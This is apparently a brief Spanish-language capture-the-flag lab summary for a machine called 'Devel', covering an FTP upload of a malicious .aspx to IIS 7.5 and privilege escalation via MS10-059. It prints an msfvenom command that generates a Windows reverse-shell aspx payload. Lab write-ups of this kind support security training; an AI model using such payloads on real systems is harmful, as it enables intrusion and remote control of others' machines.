xerosec
Buscar
K

Devel

Resumen de la resolución

  • Máquina con servicio FTP expuesto con permisos de escritura
  • Creación de código malicioso .aspx con MSFVenom para ejecutarlo en un servidor web Microsoft IIS 7.5
  • Escalada de privilegios con Kernel Exploit MS10-059 (Chimichurri)

Habilidades adquiridas

  • Al subir un binario por FTP se debe usar el comando bin para que sea interpretado como tal

Comandos y herramientas destacables

  • Búsqueda recursiva desde Windows cmd
where /r c:\ iisstart.htm
  • Reverse Shell aspx con MSFVenom
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 -f aspx > exploit.aspx

Walkthrough en YouTube:

Pendiente
Última actualización 1mo ago